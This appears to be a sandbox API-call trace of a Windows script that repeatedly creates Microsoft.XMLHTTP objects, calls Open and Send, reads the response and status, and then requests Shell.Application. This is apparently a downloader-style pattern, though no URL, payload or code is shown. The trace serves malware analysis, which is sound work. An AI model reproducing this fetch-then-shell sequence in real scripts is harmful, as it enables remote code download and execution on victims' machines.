	[0496.075] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bc0) returned 0x3
	[0496.075] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0496.076] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bc0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0496.078] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0496.078] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0496.078] SysStringLen (param_1=0x0) returned 0x0
	[0496.078] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0496.079] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0496.079] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0496.079] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0496.079] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0496.079] ??2@YAPEAX_K@Z () returned 0x62f330
	[0496.079] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0496.079] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0496.079] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0496.079] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0496.079] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0496.079] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0496.080] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0496.080] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0496.080] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0496.080] SysStringLen (param_1=0x0) returned 0x0
	[0496.080] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0496.080] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0496.080] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0496.080] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0496.080] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0496.080] ??2@YAPEAX_K@Z () returned 0x62f310
	[0496.080] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f310) 
	[0496.080] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0496.080] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0496.081] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0496.081] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0496.081] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0496.081] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0496.081] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0496.081] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0496.081] SysStringLen (param_1=0x0) returned 0x0
	[0496.081] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0496.081] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0496.081] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0496.081] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0496.081] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0496.081] ??2@YAPEAX_K@Z () returned 0x62f330
	[0496.082] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0496.082] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0496.082] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0496.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0496.082] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0496.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0496.082] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0496.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0496.082] longjmp () 
	[0496.082] longjmp () 
	[0496.082] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0496.082] SysStringLen (param_1=0x0) returned 0x0
	[0496.083] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0496.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0496.083] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bc0) returned 0x0
	[0496.083] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0496.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0496.083] ??2@YAPEAX_K@Z () returned 0x62f310
	[0496.083] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f310) 
	[0496.083] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0496.084] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0496.084] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bc0) returned 0x0
	[0496.084] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bc0) returned 0x3
	[0496.084] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0496.084] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bc0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0496.084] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0496.084] longjmp () 
	[0496.084] longjmp () 
	[0496.084] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0496.084] SysStringLen (param_1=0x0) returned 0x0
	[0496.085] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0496.085] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0496.085] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0496.085] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0496.085] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0496.085] ??2@YAPEAX_K@Z () returned 0x62f330
	[0496.085] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0496.085] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0496.085] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0496.085] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0496.085] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0496.085] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0496.085] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0496.086] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0496.086] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0496.086] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0496.086] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0498.051] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0498.051] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0498.051] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0498.052] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0498.052] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0498.052] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0498.052] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0498.052] SysStringLen (param_1=0x0) returned 0x0
	[0498.052] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
